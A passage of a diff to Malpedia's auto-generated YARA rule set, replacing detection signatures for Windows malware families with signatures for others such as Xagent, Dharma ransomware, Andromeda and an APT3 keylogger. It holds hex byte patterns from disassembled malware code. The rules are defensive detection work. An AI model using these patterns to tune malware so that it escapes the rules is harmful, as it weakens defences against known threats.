malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 337df8 8b5dfc 237df4 337df0 037dc0 8dbc1faf0f7cf5 } - $sequence_1 = { e8???????? 50 8bc7 e8???????? 83c404 e8???????? 50 } - $sequence_2 = { 0fbe7c0602 57 e8???????? 83c404 85c0 7405 8d47d0 } - $sequence_3 = { 8b4610 8b0cb8 8911 8b55f8 } - $sequence_4 = { 57 e8???????? 8b1d???????? 83c410 6a00 } - $sequence_5 = { 83c404 895df8 85db 750c 6a01 e8???????? 83c404 } - $sequence_6 = { 6a01 6a0e 56 ff15???????? } - $sequence_7 = { 6a04 8d4df8 51 6a04 6a00 56 } - $sequence_8 = { ff15???????? 57 8bf0 53 56 ff15???????? 50 } - $sequence_9 = { 337df4 337dfc 037dcc 8dbc1ff87ca21f 8b5df0 c1c710 } + $sequence_0 = { 833f01 0f94c0 84c0 7407 } + $sequence_1 = { 833f01 0f94c0 84c0 7407 e8???????? eb05 } + $sequence_2 = { 833f01 0f94c0 84c0 7407 e8???????? } + $sequence_3 = { 833f01 0f94c0 84c0 7407 e8???????? eb05 e8???????? } + $sequence_4 = { 6a0c 51 e8???????? 83c410 8b858cf8ffff 3bc3 746e } + $sequence_5 = { 4885c9 740c e8???????? 4c8935???????? 488d0ddf710200 ff15???????? } + $sequence_6 = { 741b 498d8c243a250000 458ac6 b213 e8???????? f7d8 1bdb } + $sequence_7 = { 51 e8???????? 83c410 81c6a8000000 8bc6 8d5002 668b08 } + $sequence_8 = { c20400 8b4508 c7462c00000080 c74644ffffffff 85c0 7403 894644 } + $sequence_9 = { 7416 4883ffff 7410 8bcd e8???????? 488bcf ffd0 } condition: - 7 of them and filesize <504832 + 7 of them and filesize <709632 } -rule MALPEDIA_Win_Pikabot_Auto : FILE +rule MALPEDIA_Win_Darkrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "16fbebe5-029d-50d1-a8a8-9f8a45a24f27" + id = "73555b6d-cd36-53aa-b241-54638d6391a7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pikabot_auto.yar#L1-L175" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkrat_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "81c8e73356106864f0a8f72d23108459a17754dd4d587aefd7feb43e822dba1f" + logic_hash = "e98d828b961bffb4ad606aad50a055367532a60432b86ca76a8c360da1aac44b" score = 75 quality = 75 tags = "FILE" @@ -145968,39 +148757,32 @@ rule MALPEDIA_Win_Pikabot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945f8 8b4510 8945f4 8b4510 48 } - $sequence_1 = { 894510 837df400 741a 8b45fc 8b4df8 8a09 } - $sequence_2 = { 8b4df8 8a09 8808 8b45fc } - $sequence_3 = { 40 8945fc 8b45f8 40 8945f8 ebd3 8b4508 } - $sequence_4 = { 8945f8 ebd3 8b4508 c9 c3 55 } - $sequence_5 = { 83ec0c 8b4508 8945fc 8b450c 8945f8 8b4510 } - $sequence_6 = { 7ce9 8b4214 2b420c 5f } - $sequence_7 = { e8???????? ffd0 c9 c3 55 8bec } - $sequence_8 = { 8bfa 85c9 7436 85ff } - $sequence_9 = { 8b0cba 03ce e8???????? 8bd0 } - $sequence_10 = { 8a1c08 8d4320 0fb6c8 8d53bf 80fa19 } - $sequence_11 = { 40 8945fc 3bc7 72d5 } - $sequence_12 = { 55 8bec 83ec10 53 56 8b35???????? b84d5a0000 } - $sequence_13 = { e8???????? 8bd0 e8???????? 3b45fc } - $sequence_14 = { c3 56 8bf1 85c9 7419 85d2 7415 } - $sequence_15 = { 84c0 75f6 c60100 8bc6 5e } - $sequence_16 = { c9 c3 64a130000000 8b4018 c3 55 } + $sequence_0 = { 837de810 895510 8b4804 8d45d4 0f4345d4 2975b4 } + $sequence_1 = { 51 03f8 52 57 e8???????? 8b45c8 83c40c } + $sequence_2 = { 51 56 e8???????? 83c40c c6043e00 eb17 57 } + $sequence_3 = { 8b7dd4 0f8514ffffff 8b55ec 83fa10 } + $sequence_4 = { 8bd0 b805000000 2bd6 8a0e 8d7601 884c32ff 83e801 } + $sequence_5 = { e8???????? 83c408 c745e800000000 8d4dd8 } + $sequence_6 = { 0b510c 52 e8???????? c745fc04000000 e8???????? 84c0 7507 } + $sequence_7 = { 83c408 c745e800000000 8d4dd8 c745ec0f000000 c645d800 } + $sequence_8 = { ff75d0 51 8bcb e8???????? 8b75b8 c645fc01 } + $sequence_9 = { 895510 8b4804 8d45d4 0f4345d4 2975b4 03c6 ff75b4 } condition: - 7 of them and filesize <1717248 + 7 of them and filesize <884736 } -rule MALPEDIA_Win_Get2_Auto : FILE +rule MALPEDIA_Win_Unidentified_044_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f91c1425-fc52-545b-9271-7db19be38856" + id = "a037a55a-a1d2-5696-aa65-bcad92ff6480" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.get2_auto.yar#L1-L170" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_044_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "5e9d36a39aed19f2ddf758df0012d6d0406c361deba19029a1cb530866b49568" + logic_hash = "fa0bbb48e3a00969b6207e7af2c24fceeabe6227dd53aafea6a4369ea97af4c2" score = 75 quality = 75 tags = "FILE" @@ -146014,40 +148796,34 @@ rule MALPEDIA_Win_Get2_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4004 f644080c06 74d5 8d4d84 e8???????? 8d4584 c645fc03 } - $sequence_1 = { 0f859a000000 f6c104 7430 8d4c2404 e8???????? } - $sequence_2 = { e8???????? ff7510 8d4dc0 ff750c e8???????? 83c420 83781410 } - $sequence_3 = { 57 53 8d4dd8 e8???????? 8bc6 e8???????? c3 } - $sequence_4 = { 33c0 895dd4 668945d8 51 51 52 } - $sequence_5 = { 8d44240c 68???????? 50 eb69 f6c102 8d4c2404 742b } - $sequence_6 = { 8b4910 23c8 0f849e000000 807d0c00 } - $sequence_7 = { 897e08 33db c745ec07000000 43 897de8 } - $sequence_8 = { 0f95c3 8bc3 488b5c2450 488b4c2448 } - $sequence_9 = { 4533f6 4863df 488d0dbc730200 488bc3 83e33f } - $sequence_10 = { 4885ff 75eb 33c0 48894110 } - $sequence_11 = { 488bc8 0fb7045e 663901 740f 48ffc3 493bde } - $sequence_12 = { 663931 7451 488d1590280100 e8???????? 85c0 7441 } - $sequence_13 = { 7203 488b00 668938 488d8b40010000 } - $sequence_14 = { 85c0 750d ff15???????? 41898660010000 4032ff } - $sequence_15 = { 488b4708 4a8b4cf008 488b4618 4c3b24c8 0f85d0fbffff 488b4648 } + $sequence_0 = { 8bca 8bd8 e8???????? 83c404 84c0 7409 668b542408 } + $sequence_1 = { 3bcf 7416 8d9b00000000 80792400 7403 } + $sequence_2 = { c3 8b8424e4020000 6a10 6a00 50 } + $sequence_3 = { 74b3 33ff 397c2418 76ab 33c0 } + $sequence_4 = { ff15???????? 3d1e270000 7552 8b442408 85c0 } + $sequence_5 = { 2bf0 03d8 85f6 7fe2 } + $sequence_6 = { 803e00 8be8 743f 53 57 } + $sequence_7 = { ffd5 8bb42464050000 85c0 7f85 7c24 f644242420 0f8468feffff } + $sequence_8 = { c7460403000000 ffd3 5b 5f 32c0 5e } + $sequence_9 = { 55 e8???????? 83c40c 84c0 74a0 8a442413 } condition: - 7 of them and filesize <720896 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Gamotrol_Auto : FILE +rule MALPEDIA_Win_Winmm_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a4423f00-4d12-5905-ae9f-2ac00b302637" + id = "e5922e79-076b-5a5c-ba27-8c0bb532ca1f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gamotrol_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.winmm_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "dbb5086714c8814bb752b80e0051cf0358b1814ba2516480704e9248f4a5718d" - score = 75 - quality = 75 + logic_hash = "9d8038e46a83e5b1250014db0840b8d665afb5078d6d9005cce493b4024246af" + score = 60 + quality = 35 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -146059,34 +148835,34 @@ rule MALPEDIA_Win_Gamotrol_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5e c3 6a04 b8???????? e8???????? e8???????? 50 } - $sequence_1 = { ff15???????? 8b4b54 6a04 6800100000 51 56 } - $sequence_2 = { 90 8bec 85f6 41 49 6843700000 83c40a } - $sequence_3 = { 6aff 68???????? 68???????? 6a00 ff15???????? 6a00 53 } - $sequence_4 = { 8be5 90 5d 6803010000 } - $sequence_5 = { 8d9540fbffff 52 68???????? ffd6 33c0 8945ad 8945b1 } - $sequence_6 = { c6854fffffff61 c68550ffffff67 889d51ffffff c68552ffffff56 c68553ffffff69 889d54ffffff } - $sequence_7 = { 0fbec2 0fb680a0ed2e00 83e00f 8b4db8 6bc009 0fb68408c0ed2e00 6a08 } - $sequence_8 = { 8b01 57 ff5004 5f 5e c3 8b442404 } - $sequence_9 = { 49 41 49 90 8be5 90 } + $sequence_0 = { 740c 663d3000 7406 663d2000 750b 668b042e 03f5 } + $sequence_1 = { 03ce 7504 33c0 5e } + $sequence_2 = { 7d03 6a01 5f 85ff 0f8449ffffff } + $sequence_3 = { 89462c ff15???????? 8bce 894604 e8???????? 85c0 } + $sequence_4 = { 8bc8 ff5274 c3 33c0 c3 c3 56 } + $sequence_5 = { 83c308 bf80000000 eb1d 83e86e } + $sequence_6 = { e8???????? 59 eb1d 6a02 83c304 5f } + $sequence_7 = { 663d2000 750b 668b042e 03f5 663bc7 75c0 397c2428 } + $sequence_8 = { 7c02 8bfd 3b7c2428 7f5a 8b7c2428 } + $sequence_9 = { 83c40c 85c0 752d 83c606 } condition: - 7 of them and filesize <376832 + 7 of them and filesize <278528 } -rule MALPEDIA_Win_Grillmark_Auto : FILE +rule MALPEDIA_Win_Xagent_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "891e7259-5469-58d4-a39e-a516f4f2c7d3" + id = "bde2508f-cfa2-522c-bf18-0bedb23d3501" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grillmark_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xagent_auto.yar#L1-L231" license_url = "N/A" - logic_hash = "fc8f047bb79d7c6ba82d87162ce46a1dc6555c1672864dfce07f64d88dd917ae" + logic_hash = "1ef231aa11dc012f9839829c886b5e479b3c99a501478ca77ee155ba663fd5ac" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -146098,34 +148874,50 @@ rule MALPEDIA_Win_Grillmark_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83bd44ffffff04 7705 bb???????? 83bd44ffffff05 8b8548ffffff 7528 85c0 } - $sequence_1 = { 5e 5d c21400 55 8bec 56 68???????? } - $sequence_2 = { 59 7e13 50 57 6800000002 ff15???????? 8bd8 } - $sequence_3 = { 7409 ff75fc ff15???????? 56 56 56 } - $sequence_4 = { 66895dc4 50 c745c001010000 e8???????? ff7508 8d8590feffff 50 } - $sequence_5 = { 6a09 ab 59 8d7dc0 8975bc 8975f8 } - $sequence_6 = { 8dbdfdfeffff 889dfcfeffff 53 f3ab 66ab aa 8d85fcfeffff } - $sequence_7 = { 8d85f8fdffff 50 750d ffd7 8d85f4fcffff 50 } - $sequence_8 = { ff75f8 56 ff7508 ff75fc e8???????? 83c418 } - $sequence_9 = { ffd6 85c0 7473 8d45c8 } + $sequence_0 = { c1ea02 6bd20d b801000000 2bc2 } + $sequence_1 = { ff15???????? 8bd8 e8???????? 03d8 } + $sequence_2 = { 5b 8be5 5d c20400 8d4de4 e8???????? b8???????? } + $sequence_3 = { 8b4604 85c0 7407 8b4d08 8b11 } + $sequence_4 = { 2bc7 8b5204 8b0482 8b0488 8b4e10 } + $sequence_5 = { 85c9 7423 8b7e08 ff460c 03ff } + $sequence_6 = { 33d2 eb02 8b11 8b4808 8bc1 57 } + $sequence_7 = { 3b7e0c 7707 c7460c00000000 49 } + $sequence_8 = { 894e10 7507 c7460c00000000 5f } + $sequence_9 = { 55 8bec 33c0 83ec0c 39412c } + $sequence_10 = { 384b02 0f92c3 488d4c2430 e8???????? 90 } + $sequence_11 = { e8???????? 90 0fb705???????? 6689442420 } + $sequence_12 = { e8???????? 488b4328 4c8bcf 4c8bc6 } + $sequence_13 = { 84c0 740c 488b07 488b0b } + $sequence_14 = { 8bd8 e8???????? 8d0c18 e8???????? } + $sequence_15 = { 48896c2410 4889742418 57 4883ec30 4883792800 } + $sequence_16 = { e8???????? 498bce 4e8d0437 482bcf } + $sequence_17 = { 740c 488b07 4c8b13 488903 } + $sequence_18 = { b803b57ea5 f7e6 c1ea06 6bd263 } + $sequence_19 = { ff15???????? baf4010000 488bcb ff15???????? 85c0 } + $sequence_20 = { c1ea07 69d295000000 2bca 8bd1 } + $sequence_21 = { 75f8 482bc3 4d8bc6 498bd7 } + $sequence_22 = { 75f8 482bc3 4c8bc6 488bd7 } + $sequence_23 = { 75f8 482bc3 498bd7 488d0c18 } + $sequence_24 = { 75f8 482bc5 4533e4 488bbc2480000000 } + $sequence_25 = { 75f8 482bc3 498bd6 488d0c18 e8???????? 488bd7 4885ff } condition: - 7 of them and filesize <212992 + 7 of them and filesize <729088 } -rule MALPEDIA_Win_Purelocker_Auto : FILE +rule MALPEDIA_Win_Jaku_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d1d522a1-058f-5ee5-85f2-56e8688f09bf" + id = "2a488cc0-1b28-5098-bf2b-d901cf20342d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.purelocker_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jaku_auto.yar#L1-L268" license_url = "N/A" - logic_hash = "42140169d70d3c64021f0eb71e13968d0cb2f62e4e2540159ee39f96b2cca71d" + logic_hash = "d05d79a0c954b2e0606ed773ff3f73ae5387638edb50352f452263cfa013d18a" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -146137,32 +148929,51 @@ rule MALPEDIA_Win_Purelocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c7042400000000 8d442434 50 8d842440040000 50 8d842440020000 } - $sequence_1 = { c1e908 81e1ff000000 331c85201c0110 8b442414 8b148d20180110 335f08 } - $sequence_2 = { 8b442410 0fb6c0 330c8520300110 8bc6 } - $sequence_3 = { 6a00 85c9 59 751a 8bda 53 } - $sequence_4 = { 53 ba17000000 83ec04 c7042400000000 4a 75f3 e8???????? } - $sequence_5 = { 8d1524400110 59 e8???????? 741e 8b542468 52 } - $sequence_6 = { 50 31c0 50 8b15???????? 52 e8???????? 5a } - $sequence_7 = { e8???????? 8d1524400110 8d0d285e0110 e8???????? 8d1524400110 8d0d845d0110 } - $sequence_8 = { e8???????? e8???????? 011424 e8???????? 58 8b542408 52 } - $sequence_9 = { 50 680a000000 ff742418 e8???????? e8???????? 52 e8???????? } + $sequence_0 = { 8b466c 234634 8b4e40 8b5644 668b7e6c 0fb70441 } + $sequence_1 = { 0f84d0000000 8b4d1c 8b550c 0fb709 0fb71c4a } + $sequence_2 = { c70610000000 eb1f 56 e8???????? 837d0c06 59 } + $sequence_3 = { e8???????? 59 894660 59 837e6003 0f8223010000 } + $sequence_4 = { 56 8b7510 57 6a08 33c0 59 } + $sequence_5 = { 8b96a4160000 8a0408 8b8ea0160000 66892c4a 8b8e98160000 } + $sequence_6 = { 6a0f 58 8d4dc6 8b17 } + $sequence_7 = { 83c41c 84c0 742b 8b450c 85c0 } + $sequence_8 = { 68???????? ff15???????? c3 b8???????? e8???????? 83ec2c } + $sequence_9 = { ff742408 e8???????? c20800 8bc1 } + $sequence_10 = { 5b c3 55 8bec 833d????????00 53 56 } + $sequence_11 = { 53 68000000a0 6a03 53 } + $sequence_12 = { 6a01 03c3 68???????? 50 e8???????? 83c40c 85c0 } + $sequence_13 = { 7507 b800308000 eb02 33c0 } + $sequence_14 = { 7508 83c8ff e9???????? 8b839f830000 } + $sequence_15 = { 75dd 57 e8???????? 59 } + $sequence_16 = { 55 56 57 6880020000 } + $sequence_17 = { 0245fd 3245fe 8a4dff d2c8 } + $sequence_18 = { 016c242c 8b44242c 5f 5e 5d } + $sequence_19 = { 50 e8???????? 59 8b4e2c } + $sequence_20 = { 85f6 b301 0f8491000000 56 e8???????? } + $sequence_21 = { e8???????? 59 eb57 53 } + $sequence_22 = { 56 e8???????? 59 8b4620 } + $sequence_23 = { 8d4608 57 e8???????? 8365e000 } + $sequence_24 = { e8???????? 8b7dd8 397de8 7593 6804010000 8d8574feffff 50 } + $sequence_25 = { a4 ff839f830000 8b839f830000 8b8b97830000 8901 33c0 40 } + $sequence_26 = { ff75f4 66899e4d720000 8d9e8f7e0000 53 81c6917e0000 } + $sequence_27 = { 6a00 e8???????? 50 e8???????? b001 8b55b4 64891500000000 } + $sequence_28 = { 6a00 53 e8???????? 0fbe532e } condition: - 7 of them and filesize <193536 + 7 of them and filesize <2220032 } -rule MALPEDIA_Win_Bs2005_Auto : FILE +rule MALPEDIA_Win_Keylogger_Apt3_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ef8c48f9-bc67-59c3-a57f-caa042b605de" + id = "0f9f82cd-fdec-56a7-a0cb-1e9762492ad7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bs2005_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.keylogger_apt3_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "31d800fc437e882f8e75451d429896908d917d51b135f51d420139339a52e53c" + logic_hash = "d74e9ef23a0b946252054fc1985382779e2408df3e68ecb0420a27d04cacd609" score = 75 quality = 75 tags = "FILE" @@ -146176,32 +148987,32 @@ rule MALPEDIA_Win_Bs2005_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 85c0 0f845f030000 8b500c } - $sequence_1 = { 7505 b83f000000 8d5abf 83c9ff 80fb19 771c 0fbeca } - $sequence_2 = { 51 50 8b02 83c041 50 e8???????? 8b974c060000 } - $sequence_3 = { 8b02 8a9049000400 8b8f54060000 889111010000 } - $sequence_4 = { 51 c645c800 e8???????? 83c40c b9???????? 8d8324010000 8da42400000000 } - $sequence_5 = { eb09 3c2f 7505 b93f000000 8d5abf 83c8ff 80fb19 } - $sequence_6 = { 50 8d9500ffffff 52 68???????? e8???????? 6804010000 6a00 } - $sequence_7 = { ffd6 33c0 68???????? 8d4dec 68???????? 51 8945ec } - $sequence_8 = { 8945f8 3b45f0 7cea 8b4510 } - $sequence_9 = { 8d419f 3c19 7708 0fbef1 83ee47 eb25 } + $sequence_0 = { 8be8 8d442458 50 55 57 } + $sequence_1 = { 3bf3 7523 68???????? ff15???????? 5f } + $sequence_2 = { 8b35???????? 8d6b08 55 50 ffd6 } + $sequence_3 = { 7453 53 8b5c240c 55 56 8b35???????? 8d6b08 } + $sequence_4 = { 89442420 3bf8 7216 5b 5f } + $sequence_5 = { ffd6 50 ffd7 ffd3 89442420 83f8ff 7551 } + $sequence_6 = { 0fb69695010000 50 0fb68694010000 51 52 50 } + $sequence_7 = { 84c0 75f8 2be9 8d5501 52 } + $sequence_8 = { e8???????? 68???????? 68???????? 8d4d7c e8???????? 8b45dc } + $sequence_9 = { c7442434d8174300 ffd6 8d542404 52 89442434 } condition: - 7 of them and filesize <212992 + 7 of them and filesize <761856 } -rule MALPEDIA_Win_Jackpos_Auto : FILE +rule MALPEDIA_Win_Dharma_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "095b3872-c166-52ad-a52d-1faeb1056a2e" + id = "e57e8a97-3ba4-55fc-8a7a-2d2cd02d04a4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jackpos_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dharma_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "45db7695f021a95c6d3c662e5ca72119b052256c8a3ceeaf6c22b39c2e1870c0" + logic_hash = "7cad44063f19785eb5f21218749fc586efdec21afeaf1b9147edb5d8331036bc" score = 75 quality = 75 tags = "FILE" @@ -146215,32 +149026,32 @@ rule MALPEDIA_Win_Jackpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b5604 eb03 8d5604 2bc7 03c0 50 } - $sequence_1 = { d1f8 03d0 eb0f 85c0 } - $sequence_2 = { 75ed 837df408 8b4dfc 7202 } - $sequence_3 = { 8b4508 e8???????? 8b7d08 8b550c 8b4718 3b7d10 747e } - $sequence_4 = { 52 8bf0 53 897588 e8???????? } - $sequence_5 = { 7303 8d45d8 8d4dac 51 50 e8???????? 8b55b4 } - $sequence_6 = { 85ff 7f87 5f 8bc6 5e 5b } - $sequence_7 = { 8b4604 33c9 66890c03 5f 8bc6 } - $sequence_8 = { 765a 8b4a14 57 3bc1 734e 2bc8 8bf9 } - $sequence_9 = { 037214 ebc4 5f 5e 5d } + $sequence_0 = { 8945e8 8b45ec 8b4808 8b55ec } + $sequence_1 = { 8b4824 8b5508 8b4218 8d0c48 51 68ff7f0000 } + $sequence_2 = { 68???????? 6a00 6a00 e8???????? eb0e 8b4dfc 51 } + $sequence_3 = { 8b45e4 034530 8945e4 8b4dfc 034d30 894dfc 6a06 } + $sequence_4 = { a1???????? 898574ffffff 6880000000 68???????? 8b8d74ffffff 51 68???????? } + $sequence_5 = { 8945fc 8b4d08 0fb711 d1fa 8955e0 8b45f8 c1e818 } + $sequence_6 = { 741a 8b5508 83c22c 8b4dfc 8b8108000100 } + $sequence_7 = { 8b0c85b8bf4000 81e10000ff00 33d1 8b45f4 } + $sequence_8 = { d1f8 8d4c0002 51 e8???????? 83c404 8b55ec 8b4a08 } + $sequence_9 = { 8b55f4 83c201 8955f4 eba3 8b45f8 50 e8???????? } condition: - 7 of them and filesize <319488 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Terminator_Rat_Auto : FILE +rule MALPEDIA_Win_Yoddos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9d4805e3-697a-5809-9888-0af99434fee9" + id = "731c8af4-0cfb-5784-8919-5690671f4ddf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.terminator_rat_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yoddos_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "460088279758b4b56f7253332ea9c90ec016fa5d0376dce042f468a189f77f7d" + logic_hash = "ffa9bd7fe378e38b72240a0efe08e70cc8c93f69e8ec293489b47b5a90d316d8" score = 75 quality = 75 tags = "FILE" @@ -146254,34 +149065,34 @@ rule MALPEDIA_Win_Terminator_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffb519010000 8947fc 8b47f4 8b4008 894708 e8???????? 8b47fc } - $sequence_1 = { c70020000000 8b852d010000 2b08 894804 } - $sequence_2 = { 33db 395e0c 752f 6a40 6800100000 6800180000 } - $sequence_3 = { 26a130000000 07 8b400c 8b701c } - $sequence_4 = { 50 ffb525010000 ff95e1000000 85c0 } - $sequence_5 = { eb31 ff9509010000 3d4c270000 750e } - $sequence_6 = { 57 8bfc 81ec04040000 53 56 33db } - $sequence_7 = { 8b4b0c ac 3459 c0c803 3448 c0c803 } - $sequence_8 = { ffb519010000 8947fc 8b47f4 8b4008 } - $sequence_9 = { 60 33c0 8b4f0c 8b7f08 } + $sequence_0 = { ff15???????? 85c0 0f84e0010000 8d8584fcffff 56 50 } + $sequence_1 = { 66895dd8 66895dda 6a0e e8???????? 59 8a8485a4ecffff 8845dc } + $sequence_2 = { 740c ffb5c0fcffff ff15???????? b863000000 90 b89dffffff } + $sequence_3 = { c6458e65 c6458f6e c6459055 c6459172 c645926c c6459341 } + $sequence_4 = { b89dffffff 90 33db 891d???????? b863000000 90 b89dffffff } + $sequence_5 = { 0c01 c1f905 83e61f 88450b 8d3c8d00764100 c1e603 } + $sequence_6 = { 895dfc c78538ffffff62000000 68???????? 50 e8???????? ff7508 8d8524feffff } + $sequence_7 = { 57 ff7508 e8???????? 8bf8 56 037d08 } + $sequence_8 = { 0fb7750c 6683f97e 7502 33c9 0fb7d1 8a945504ffffff 3010 } + $sequence_9 = { eb28 8d4df0 6a10 51 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <557056 } -rule MALPEDIA_Win_Cryptoshuffler_Auto : FILE +rule MALPEDIA_Win_Andromeda_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "04846f99-89cf-54cb-88bc-877d2656a7fa" + id = "06e8a020-0fd4-5226-bdbc-44028f668872" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptoshuffler_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.andromeda_auto.yar#L1-L309" license_url = "N/A" - logic_hash = "1d3d096bc8fe94bfe59d829c11ff29d324542295a6195d59ed4b925f302177ea" + logic_hash = "b22436b7aba3ed23bef95d1f14e5fb10f193d85aea0247573fcd01991d4926fb" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -146293,32 +149104,54 @@ rule MALPEDIA_Win_Cryptoshuffler_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 03fb e8???????? 8bf0 3b35???????? 7430 } - $sequence_1 = { 83c408 85c0 0f8496040000 6aff 6a00 8d442430 50 } - $sequence_2 = { 6bc830 8b049578f60210 f644082801 7421 57 } - $sequence_3 = { 0f57c0 c78424f400000000000000 68???????? 8d8c24e8000000 0f298424e8000000 e8???????? } - $sequence_4 = { c745ec10f80010 894df8 8945fc 64a100000000 8945e8 } - $sequence_5 = { e9???????? c745dc03000000 eb7c c745e0e04d0210 ebbb } - $sequence_6 = { 50 ff15???????? 8d842410030000 50 8d84248c010000 50 } - $sequence_7 = { e8???????? 8904bd78f60210 85c0 7514 6a0c } - $sequence_8 = { 0f851b010000 8b01 c6400c01 8b31 c6410c00 } - $sequence_9 = { 0f1f4000 8b06 8b4e08 3bc1 } + $sequence_0 = { 74cf ebcf 33c0 33db 33c9 33d2 8b7d10 } + $sequence_1 = { 8b7508 33db 368a942900ffffff 02c2 020433 368ab42800ffffff } + $sequence_2 = { 3688b42800ffffff 